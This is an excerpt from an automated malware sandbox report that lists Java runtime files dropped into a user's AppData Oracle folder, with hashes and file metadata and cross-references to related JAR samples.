SHA-512:	F85628B5F074607BC5E7B61DE92D86F08538805F8E8A0C5975BFB08F9311235CCAE7E1E2548F6ABC0EE2CBCD0A91CED67761E9A70ECC7A9A1E58A5D1839FF05D
Malicious:	false

C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.dat
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Dyalog APL
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
MD5:	84CAD01FDB44AE58DBE6C3973DCD87F5
SHA1:	4700B42849FB35BE323774820BF1BC8019D26C80
SHA-256:	8B1F194BE530240C18BF0B1EE0D038E750FAB8B24C6BD25C864297E5EBB41FA6
SHA-512:	6E10D3EC4724C1ACA9FF3F6A26292BA80065D18E8E9395F1474C0A298008F25E312E2F7024E7D10AAB3264764E69A25553CC20AFD23090F83921D20E42B989AB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\COPYRIGHT
Process:	C:\Windows\System32\xcopy.exe
File Type:	ISO-8859 text
Size (bytes):	3244
Entropy (8bit):	4.5048923444191455
Encrypted:	false
MD5:	51F72C3C2569E1174A83A294F7C082D6
SHA1:	1909C04288DD294DD539723C0CA3289656ADE95D
SHA-256:	89471AEA3957922DF21C7088D2687C4E43F5FF14E635E7D971083DDE540B45E3
SHA-512:	14F13277AFABD4DFB0B7E53B7E0D6BDAF8127FD97E478F203D4112F7AAC9868EE27B4A97B9FCF4A0AE868AEE6872AFC1DE2FFFBEB1E7DA4E3FF08757731E9788
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\LICENSE
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	40
Entropy (8bit):	4.208694969562841
Encrypted:	false
MD5:	98F46AB6481D87C4D77E0E91A6DBC15F
SHA1:	3E86865DEEC0814C958BCF7FB87F790BCCC0E8BD
SHA-256:	23F9A5C12FA839650595A32872B7360B9E030C7213580FB27DD9185538A5828C
SHA-512:	AC2C14C56EEA2024FCF7E871D25BCC323A40A2D1D95059C67EC231BCD710ACB8B798A8C107AAD60AAA3F14A64AA0355769AB86A481141D9A185E22CE049A91B7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\README.txt
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	46
Entropy (8bit):	4.197049999347145
Encrypted:	false
MD5:	0F1123976B959AC5E8B89EB8C245C4BD
SHA1:	F90331DF1E5BADEADC501D8DD70714C62A920204
SHA-256:	963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
SHA-512:	E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Process:	C:\Windows\System32\xcopy.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines
Size (bytes):	110114
Entropy (8bit):	4.820689169327024
Encrypted:	false
MD5:	AB9DB8D553033C0326BD2D38D77F84C1
SHA1:	D13CAC18FEC0C71D4A5CB550F6FA93FC60C39E45
SHA-256:	38995534DF44E0526F8C8C8D479C778A4B34627CFD69F19213CFBE019A7261BA
SHA-512:	178EABC5D8883E3E0A32F40ACDC8DB5A80CBABFA6689D3902880FE521B1A84425758F22CC7DD236416033B20A3FADCE6ACC03DB579F582BAE2C0AFFC0B2ECA5E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Process:	C:\Windows\System32\xcopy.exe
File Type:	UTF-8 Unicode text
Size (bytes):	178392
Entropy (8bit):	5.025277794267772
Encrypted:	false
MD5:	C1A053870CAEA266AE00C5C87A76E17D
SHA1:	449706B58D6EC5FE49F4B4043B7048E3340A9A92
SHA-256:	65C849F8E75D92CE0A7F979A4699E8BB46E286257DBCA501499FAA1467D5E46C
SHA-512:	7A697A1A4AEF27F6EA4AB72EDEBB2228A532E13BBA3CA8D61699A7E74FB7AD238209FF1B76E21850FE7AA3CF50166E0775566B56D98A94351179C2F8D216C083
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\Welcome.html
Process:	C:\Windows\System32\xcopy.exe
File Type:	HTML document, ASCII text
Size (bytes):	955
Entropy (8bit):	5.096095653697231
Encrypted:	false
MD5:	55FB6ECFB9C81819A76E8D91D83DFC6B
SHA1:	8D1DB6CD5DF4626EEE7DF051E2DEDCF28ED08B51
SHA-256:	84599B5F0C5ECA91886B743C17A9614E77FACF1E31F6F11FC59A60DD60DD40DF
SHA-512:	5EA60538F50D38AA9432D1482EFC0BC69051C8982DCC6FB5125C4E4A778FF0C69ED811A62BCB6F63979C2A44866C6CCAA4910ACF4AD15E4654CEBC93076E8781
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	15272
Entropy (8bit):	6.164619519922819
Encrypted:	false
MD5:	00E0C05619D79213B95CAD6050610170
SHA1:	C406B0FB1D34339FE917565CB5BDB15FED1125B9
SHA-256:	5801F7CDC0E7E51C931E3652CE031864A55B5044E524AD4886C5EF38DD0B2412
SHA-512:	577934C1997DEBB3E61E9E666B0CE1FA98840620CB34955716727E1BD8F2F41F5D816E9CDB110A9EF999FC8323B55F45A0C5222097A805D6C839F7D631C5BD96
Malicious:	false
Joe Sandbox View:	Filename: 25New Order.jar, Detection: malicious, Browse Filename: 49scan_201717067354367.jar, Detection: malicious, Browse Filename: 73Doc Bidding Tender PO-211411.jar, Detection: malicious, Browse Filename: 74Profoma Invoice pdf copy.jar, Detection: malicious, Browse Filename: 1TT_COPY_A2017030255.jpg.jar, Detection: malicious, Browse Filename: 97Payment-pdf.jar, Detection: malicious, Browse Filename: 95April PO.jar, Detection: malicious, Browse Filename: 69AWBRef38304003993.pdf.jar, Detection: malicious, Browse Filename: 98SWIFT.jar, Detection: malicious, Browse Filename: 93NEW_INVOICE_ORDER_0948776633.jar, Detection: malicious, Browse Filename: 45Inquiry No. (12157) PI from threeway 1214.jar, Detection: malicious, Browse Filename: 46Order Specification.jar, Detection: malicious, Browse Filename: 77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar, Detection: malicious, Browse Filename: 89CV.jar, Detection: malicious, Browse Filename: 83PO-04217.jar, Detection: malicious, Browse Filename: 179P-39 Oxfam Australia.jar, Detection: malicious, Browse Filename: 11previous Quotation.jar, Detection: malicious, Browse Filename: 83April Order.jar, Detection: malicious, Browse Filename: 27TT_COPY_A2017030255.jpg.jar, Detection: malicious, Browse Filename: 55documents.pdf.jar, Detection: malicious, Browse

C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	127912
Entropy (8bit):	6.428937384146365
Encrypted:	false
MD5:	B0E11CBCFDCB76475DABA8A64EFA2342
SHA1:	9D30E43CFA7A578942B02262C18D9BEDE7D86F84
SHA-256:	A8A29ADC8B64F723298CCB00322A47844C7A1C83D1054F8E702F79246ED50A8B
SHA-512:	15127F67D44F96F19460FE8A6BBBE3D208977C80E4C3EE072C0B8B004C781516018BAB22D90C08D333B5392C803CEEBD70167087D6E3151CECD9954ABE344503
Malicious:	false
Joe Sandbox View:	Filename: 25New Order.jar, Detection: malicious, Browse Filename: 49scan_201717067354367.jar, Detection: malicious, Browse Filename: 73Doc Bidding Tender PO-211411.jar, Detection: malicious, Browse Filename: 74Profoma Invoice pdf copy.jar, Detection: malicious, Browse Filename: 1TT_COPY_A2017030255.jpg.jar, Detection: malicious, Browse Filename: 97Payment-pdf.jar, Detection: malicious, Browse Filename: 95April PO.jar, Detection: malicious, Browse Filename: 69AWBRef38304003993.pdf.jar, Detection: malicious, Browse Filename: 98SWIFT.jar, Detection: malicious, Browse Filename: 93NEW_INVOICE_ORDER_0948776633.jar, Detection: malicious, Browse Filename: 45Inquiry No. (12157) PI from threeway 1214.jar, Detection: malicious, Browse Filename: 46Order Specification.jar, Detection: malicious, Browse Filename: 77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar, Detection: malicious, Browse Filename: 89CV.jar, Detection: malicious, Browse Filename: 83PO-04217.jar, Detection: malicious, Browse Filename: 179P-39 Oxfam Australia.jar, Detection: malicious, Browse Filename: 11previous Quotation.jar, Detection: malicious, Browse Filename: 83April Order.jar, Detection: malicious, Browse Filename: 27TT_COPY_A2017030255.jpg.jar, Detection: malicious, Browse Filename: 55documents.pdf.jar, Detection: malicious, Browse

C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	96680
Entropy (8bit):	6.406174713796478
Encrypted:	false
MD5:	6C9FF3DDAB045FE7375FA33663DF6922
SHA1:	5F6F71131F50CFFC64D220EF2D01373E1AFBF81D
SHA-256:	917F2E127ACEE79FE034DA56B4813FDC0AEEC607F0C6AF835F18CF21552EA892
SHA-512:	7E406AEA67F3AE4099652E724F7AFCEB266BA350FDD7C5F40CFAF17A5E63EEEB3B18A4062A27F8CD2F09702573A81B29112A8DCEA59A82DAB13035DC45167960
Malicious:	false
Joe Sandbox View:	Filename: 25New Order.jar, Detection: malicious, Browse Filename: 49scan_201717067354367.jar, Detection: malicious, Browse Filename: 73Doc Bidding Tender PO-211411.jar, Detection: malicious, Browse Filename: 74Profoma Invoice pdf copy.jar, Detection: malicious, Browse Filename: 1TT_COPY_A2017030255.jpg.jar, Detection: malicious, Browse Filename: 97Payment-pdf.jar, Detection: malicious, Browse Filename: 95April PO.jar, Detection: malicious, Browse Filename: 69AWBRef38304003993.pdf.jar, Detection: malicious, Browse Filename: 98SWIFT.jar, Detection: malicious, Browse Filename: 93NEW_INVOICE_ORDER_0948776633.jar, Detection: malicious, Browse Filename: 45Inquiry No. (12157) PI from threeway 1214.jar, Detection: malicious, Browse Filename: 46Order Specification.jar, Detection: malicious, Browse Filename: 77B&L Order No 171022 - Master Mar - MV Northern Juvenile.jar, Detection: malicious, Browse Filename: 89CV.jar, Detection: malicious, Browse Filename: 83PO-04217.jar, Detection: malicious, Browse Filename: 179P-39 Oxfam Australia.jar, Detection: malicious, Browse Filename: 11previous Quotation.jar, Detection: malicious, Browse Filename: 83April Order.jar, Detection: malicious, Browse Filename: 27TT_COPY_A2017030255.jpg.jar, Detection: malicious, Browse Filename: 55documents.pdf.jar, Detection: malicious, Browse

C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	1182632
Entropy (8bit):	6.632460816833635
Encrypted:	false
MD5:	F1A828FE3BF1DA7FC2160BEBDBA9F481
SHA1:	DCD26A9A2D73EC83A1B0052BF80A742E2944BE07
SHA-256:	746B60FB63A4ED89B77FAE70B063AE56658866D74293AB2229DE12D0DC7A641A
SHA-512:	26BEBFCBA898B89DEDC9107A25322CCE8D53D7F3234228A09EBA5FBD7B017680360709EBDD818BFED0822B62EDEEB4B549671BDD2CF18415FE49C4CBAB3A61B3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.3985117236768465
Encrypted:	false
MD5:	1AF266A286FD90BFB2907BCBEFA905EB
SHA1:	A369C943885297F786B7A32AE49B4080244039B8
SHA-256:	94BAB5BCE0E2989D3B68D3C3B85A1DF8A91C1D4AC291DD541F3E4250946185A8
SHA-512:	2A81DB03B4672374ADF3AC0073D8972116E19A438588E114F060039AF4BB2E2FF9BC5C7E6BDE65273843DD36FEE6628FAC5797CFAA43C4CB14BD237981806560
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\client\Xusage.txt
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	1423
Entropy (8bit):	4.176285626070562
Encrypted:	false
MD5:	B3174769A9E9E654812315468AE9C5FA
SHA1:	238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
SHA-256:	37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
SHA-512:	0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\client\classes.jsa
Process:	C:\Windows\System32\xcopy.exe
File Type:	data
Size (bytes):	12058624
Entropy (8bit):	5.0945235999446155
Encrypted:	false
MD5:	A86E5A890BA566B3BF60266CEF9ED944
SHA1:	873E231EA683A3B059A7FBF6D86FA8A971148289
SHA-256:	291A508196AB040C896D296111066EDC91867818DAB7EE5ECE8612EED3604A1B
SHA-512:	96610B2BE00D5902EF87A824CE5700C8D7EFB48411220591EFE9B1254997EE241A7C1ADB72B049D0B624555EAF73F4F099E0121B5BC33A9DCA11EAA806D23214
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	3816360
Entropy (8bit):	6.8507078799698435
Encrypted:	false
MD5:	69F4C331CF2FA5E6757FFB74813ACBAB
SHA1:	CF75071F54D19BA156D686A0F7F428B38B6D235C
SHA-256:	7C87B9B0A466D6EB813E2366734572166C56329F6312D6A0420CDDA41DAF079A
SHA-512:	B6FFBAD63C3EB34DA2580C5F736901DD5E4E4B8BC0B3FD5913F7B1E6AACE217E631B71EE4079AE8CFEBF3BED326B28BEFB9AF3D732235620426EA102A05440CC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	143272
Entropy (8bit):	7.356579102237894
Encrypted:	false
MD5:	EF34F23B67BA4E93F94149FD52E12C4F
SHA1:	47E0325D4723B90EA9DA956077B8542BBF115FF7
SHA-256:	A89D0C6A1531837ECAD1F6845CFA471700BB612F3B99760DB6EF53B97F324604
SHA-512:	83AA25099CB8C7FD6DF9536BBA5F84B7E1C5AF05F88E76353DA434F9988DC9CCD30E720CA27E8F2A60751713BFDC09DC27EB5CAD9A573DCFDCF7AF9C91EE1F9D
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	63400
Entropy (8bit):	6.422243172946979
Encrypted:	false
MD5:	057A2893EB2B001B1D429419D67E32B7
SHA1:	CC3B8EEAC10F7F4F4A5DE71F75ED980AE85CB082
SHA-256:	9E50D25CBCE3D7CE39BBED9EE74166BC09A9F0C6637A50C0D7F415B3D6B31D52
SHA-512:	6147E6E1C82F5286C6F979CC0696B19F522EE512949FEA766787F8C6948E17CBD33165193C28DC30EBDDE6CA495CD448C21A12DAC75CF437D7FDC4FE1BD60D93
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	438696
Entropy (8bit):	6.531979858282071
Encrypted:	false
MD5:	1CC4E97C8A14CBD5CFCFA09C514FBADF
SHA1:	A887FFDEB1CD88EF2B5FDE36906806C8A523747C
SHA-256:	A7B9683FE73715B24D41BA4C88DF4863BECA9403DDC3EAD30046443E448B45A5
SHA-512:	4AE869AF12B44F4D48BDBECE8456525B79801E752B00602558C7AC1127C261A466EFD6322C13AA76304DAC05F7B76EA54C1518FDF88D45592509C785820D6EF9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	25512
Entropy (8bit):	6.634422725340801
Encrypted:	false
MD5:	552ADA56DDB0D9C6A811806895CD337B
SHA1:	A07E39B62926BF448E2E2B458A88D2BE1B3B6D7F
SHA-256:	96226E26422D54F1ECE0E2925B1EB2BB931D187D98276918D1E70C0134663843
SHA-512:	A699DACA179E100A066151C94D66D00DD0657EA3FF6B8E99AC5135F6E119A5612431DF568C5DE9E5EDB04DD3B4303F9571C701FA759BDC97A3E7F1BC10D1C940
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	21928
Entropy (8bit):	6.613486595001639
Encrypted:	false
MD5:	51D9B229B5049B18DA862F48771D3ADF
SHA1:	1B4F3D6A5DF38431D0129C6411BC588C5AC2E3D7
SHA-256:	1774CCBC4A081A7DC5AF62C84E082EF4873286ACE8E5A4E1FBF1C93BE9781D03
SHA-512:	1F5EF89FF0033F5831F4DACA462DD7D846777AE4116EF6C40F35C57F973143FEB77E0565D8A879C8CEC99611CA425977B7E61B109093FC78F6CE5804207E2867
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	818088
Entropy (8bit):	6.026234593549197
Encrypted:	false
MD5:	7BD5D5254C02219AD8D6793A07380155
SHA1:	2DFD9A53B7ACE17D3167F19E7C48FB0239606436
SHA-256:	106F23ED681B8C602672F38B6700480065666227769FEC281BC1D1A1ADBB5205
SHA-512:	75724EBF44A54F638429C966F82F3B23ADEC74424789EF530065274E7BC562B9838ADB38CA9A61B1DD1FA82FC721EB17CD16A156C8D82D2F42781247047DA128
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	898472
Entropy (8bit):	6.169552935470235
Encrypted:	false
MD5:	F47B4F0D0DF0C28759B60CF0B0090A11
SHA1:	257A3ADE3D1EE1C0FAB945C5159A887E02D62764
SHA-256:	5E9421DEFFA01DEC2434E917ADFF8811E2A57F686D0560244BEB22107E76A1DC
SHA-512:	DB3FCC10034B572DFAFBF3AD7C51BFEC32FD4C955646D2CFF5B171B9E4E1480028645F23C996269F5FB2D8254AE4A96CB70B82103B88A7BC5264DC77341EFD88
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	109480
Entropy (8bit):	5.998726592640345
Encrypted:	false
MD5:	A58E04E403FC15ADDAA9EAA114EDD149
SHA1:	59C7FABC8D8ACBA81651C7C3EA49FDB97ED4A286
SHA-256:	77C6795F5A43988D059828A712DAF81F263A3DB23A7EFEA760EC7AE65B641B77
SHA-512:	D9419A7D09D2C765EC4E8AF52D4C6B46E660617FB66587590537997C902C5E5B5B1A2CD3E9986E0DCD1314372D75A19FB3317F967C60738697231E453D830CFA
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	222120
Entropy (8bit):	6.515505013328179
Encrypted:	false
MD5:	ACB85946547A3DDC5587BCB454CE80FE
SHA1:	D9A475915DB548582803BD6AEB2C7CABC9C43968
SHA-256:	B86BDD28AB020B3FDC96D860E20802DFE5DAE1CAF1AD8FF1204428EF4BDE5EA4
SHA-512:	88C385F136325E43BED676D8176DF4155D491C8BCBAF3C8372B3F3922679818EEC7D662EB359C9E7F60CDE1CD805FD11CFFFE8FF3A649A9D07256902C7292180
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	147880
Entropy (8bit):	6.5577375753339355
Encrypted:	false
MD5:	9FD51B428C6D90D1452C883EA4370C30
SHA1:	FCA61CD4B0586C0ACE187535BBC68AEB9FF03A00
SHA-256:	5FB486CEA6EA41636682D877443E07184A454651F209A72C6874C38F1FEF1751
SHA-512:	0EE75C061D463B1C0BFE473862193B56337E6F303084AFFE7B96FFD50264B2871484ADA89B2421F0DF37A833597C372FDC7D0EA93F37AAAE31B765A5BE7C7EA6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	205736
Entropy (8bit):	6.418369271537735
Encrypted:	false
MD5:	FCF703012EC24F5D1D0855A30893C49D
SHA1:	02700F3BC72CC7FB10B33DD7D80F5B8A7D42596B
SHA-256:	1F1F9CF93B85646ABD85BD4EBC1E197A3276789A74EAD7D6BC80C45B65117728
SHA-512:	C1619C714754DAFC042B7A12115B0BA9F0B4677C309DBBF0EF3C46D17F185EED5BD8084B4D0FF9EC003699C6D7F5794833FEEB6AE23F70CEC49EDB26BBB70A63
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	403880
Entropy (8bit):	6.087391625380174
Encrypted:	false
MD5:	F0AA7A0ED378705A3A6D185E2FAF2F6B
SHA1:	3374E62E72850496BF682FDC995CA3C496C2F76B
SHA-256:	FB95F112F1F588F9482C687B7A32913E17A7D0630E55F0AF79041ABE8BA3A66D
SHA-512:	632B406D5597518C2B439A198C1F88671AE79302106922696BF6B2BBCEF93912027504EF002F73AF2871C9D41B7D46AF954FEEFB26A862AD773AC74974509CC5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	496040
Entropy (8bit):	6.804824977356168
Encrypted:	false
MD5:	A637AA0ECCF29F21A1BEBBE73AF6979C
SHA1:	D82EDDC337F96B5C16F24A96D891A64626133F92
SHA-256:	67814AE300255A10819EA9096220B2F0324F8D1CF7B6086DD6E9E2503681C0E5
SHA-512:	63A724C1EDA023652B2E0C2F70C49EA18BC646E999AA2E68F6E1D8ABAC381C961FE5CF12B1144635CAE50BADFB29610725C08F365D3FAFE4974A67037324D7F9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	132008
Entropy (8bit):	6.727245295659331
Encrypted:	false
MD5:	9C96C90520532227A6AB73F24375F45A
SHA1:	6F0AC47D24F0E2589322A4885C813601C306BBA2
SHA-256:	1D20E73365E4163D443806E83E969400ADBC2A0FF05C126F0F58924CD6AA74D7
SHA-512:	166C5658656A8ED44689395387812E40D84B5DA9AF5E7452B9DC2E1DE01BFE9D3780F8D3347832D2C5C81CE4532B7E850F0F4C68554BF994CB98A16F1B5EF7F0
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	116136
Entropy (8bit):	6.796019769236872
Encrypted:	false
MD5:	37A55FD43F92AFB29C8FEF138E43C2B8
SHA1:	9515C861AD56B590EE7599DC75862744282FF1FD
SHA-256:	7EDC1D9856E684606EA79EF244ECE92820E0FD811D5967218C34548D3FFA4545
SHA-512:	E2E1DF30C39113D4A1E9A88C8A7A47331FD95F5DCE0820DDE2FC5150B918B2C3EC6DD53EEE4465DDD4D74A5449F9D91ABEA064DA7A365E5ED340835CB2A3C219
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	16808
Entropy (8bit):	6.507172045095971
Encrypted:	false
MD5:	D3947B63B1F4BFFEF17E2B100E0CE60E
SHA1:	A4CD3D8C9AA93D2F6A16D5250416AAB36E4ED3CA
SHA-256:	A7D3070762451358409A2D56E0B87622793BF40DC9EF6D441B52C2151DCBCFF7
SHA-512:	FBD4CA34FF385146DAF8E51DC88EE4B0B1CD481901FEA7AA0962F3629306ABE50EAC497C184C7D3D73559E6141E957189279243E853330803329693BCA96D7DC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	51112
Entropy (8bit):	6.617501861154719
Encrypted:	false
MD5:	D9B44F5D9E1CCB444CA43E53AB6C0E9F
SHA1:	545FEE4CA4170352F794835C4F757317E976BC3E
SHA-256:	978630DBE6FD872462BE4D3864184BF343C1321E238C4EA04B04B7F94906B105
SHA-512:	468CF02EDF2F72E3388B08669161D8CC8A52F4B3925D902EB03DF06086712693BC500EEB056F34496A67AA1EA547E0BCE6391F75F89154830A4D8DFEC741ACBD
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	19880
Entropy (8bit):	6.4670609282269185
Encrypted:	false
MD5:	6A50E2F0AF124C28FC8AA0124875BA39
SHA1:	FC8B4C75A38341F1FC90E0319DD77D735F77A981
SHA-256:	38F6D378A8C80A53242A64CF15F40D5BB35810E6702F46D9CD5E08BC024EBFB7
SHA-512:	6CD754F691BD254338E74580C7D00DCF5058AC0230BE8A166024B1DD1DB34AC5CB213DE4C02B7E8BD68AB8292E95324012183DFBB6993AE81E8098FC45EEE9E6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	30632
Entropy (8bit):	6.436802277720937
Encrypted:	false
MD5:	9A97AB583FB5BD6FFFCE8C47E6DCCA62
SHA1:	C010071C795EE049C91901C315523B43BB42FC25
SHA-256:	6770D372B4089D8577F634C8EFB83B175C95A8A48362A479CD42E3C4B4D21C53
SHA-512:	AFB53A6014951DA907FBA091F8D05F5749DA85DA3BDD4217C1F8C01638A68ADF36652FF8C00B33AA468A864736B94190FFDB9B4BD9B8EEE0AB298A04423DEE12
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.4332877292234
Encrypted:	false
MD5:	CBE5D74B4ECC80BF2C792C18CCEA92BF
SHA1:	82D15287FD6C67A8BA13805E6438E015A943D960
SHA-256:	5C34196ABCA07B5352D009D5804C74CBE7A2DEEA36C3707CFA12EFD18FC2688B
SHA-512:	F69507DC2285CE2642ED8FCBB97DB1D5D8BB31D4D633993F593CC6995AFBE8784A2B1F37424B487565712D83403EFF2FBB990EEC548E29D08A48C298CAEED3FA
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	125864
Entropy (8bit):	6.809661541299793
Encrypted:	false
MD5:	A96533FF8530AD3435A5126C88DD34F9
SHA1:	2A25192283AD0A3190BBE1D56AE53195D4EE7C8F
SHA-256:	0ED046B5CAB77528BFFE08D98A0D3A916E6EC676E16BDEDC23953AD82CC20975
SHA-512:	74CB45185DFFEB978692494331C261282BBE22F883BA53B57FB6F976CCC37E3F8FDD68A48C061BBED5F37BBE5BA8134A29ED63B7179240F7A01341E4D785175F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	190888
Entropy (8bit):	6.760427812463259
Encrypted:	false
MD5:	6F4EB294ACF731771AFE3EF6F7EE812D
SHA1:	B394901A279C11734DCE92DFD6B5D2F5E5B8076C
SHA-256:	0378F325E6750868430B9C6FE0619B944810D49F1686B57AE8ADF14C37EB0B6A
SHA-512:	4615183FE34693A3FEBAF3A0616D29F605C61AE0B0024C528279703302BD362D17AB2D78CF55F2B637C5FC2E92A73B37D45C70656A50A666A4DA8D411AB01C99
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	23976
Entropy (8bit):	6.63699824895556
Encrypted:	false
MD5:	478BDA55036ACBC0EEE4A31C3BE7054C
SHA1:	D2D1A4299F11A98646B2E5D4994E6FC710533910
SHA-256:	795EA58B3AABD0C222556FCC41024D5569F149F707582E968D1957B55694C6F6
SHA-512:	D759ACE64EEFE2C900CD55F6036082384B4CB114DBB0D6095EC1EF413E01F22E3E9B29BA93B6C7A63A20627ADAF3B57E6A242A58841260F8EB3A93F04F8CB173
